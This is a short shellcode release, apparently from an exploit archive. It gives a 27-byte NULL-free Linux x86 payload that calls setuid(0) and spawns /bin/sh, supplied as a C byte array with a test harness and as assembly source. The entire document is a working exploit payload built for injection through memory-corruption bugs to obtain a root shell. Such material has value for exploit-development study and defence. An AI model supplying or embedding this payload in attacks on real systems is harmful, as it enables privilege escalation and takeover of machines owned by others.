-----------[ C Source Code ]-----------
/*
Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode 
without NULLs

Coded by Chema Garcia (aka sch3m4)
   + sch3m4@opensec.es
   + http://opensec.es
  Shellcode Size: 27 bytes
  Date: 13/11/2008
*/


#include <stdio.h>

const char shellcode[]=    "\x31\xC0"        //xor eax,eax
           "\x31\xC9"        //xor ecx,ecx
           "\xB0\x17"        //mov al,17h
           "\x60"            //pusha
           "\xCD\x80"        //int 80h
           "\x61"            //popa
           "\x51"            //push ecx
           "\x68\x6E\x2F\x73\x68"    //push 0x68732f6e
           "\x68\x2F\x2F\x62\x69"    //push 0x69622f2f
           "\x89\xE3"        //mov ebx, esp
           "\xB0\x0B"        //mov al,0xb
           "\xCD\x80";        //int 0x80

int main()
{
   printf("Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) 
Shellcode without NULLs"
           "\n\nCoded by Chema Garcia (aka sch3m4)"
           "\n\t + sch3m4@opensec.es"
           "\n\t + http://opensec.es"
           "\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1);
         //(*(void (*)()) shellcode)();

   return 0;
}

-----------[/ C Source Code ]-----------

-----------[ ASM Source Code ]-----------
global _start

section .text

_start:

xor eax,eax
xor ecx,ecx
mov al,17h
pusha
int 80h ;setuid
popa
push ecx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
mov al,0xb
int 0x80;execve

-----------[/ ASM Source Code ]-----------

Greetings,
Chema García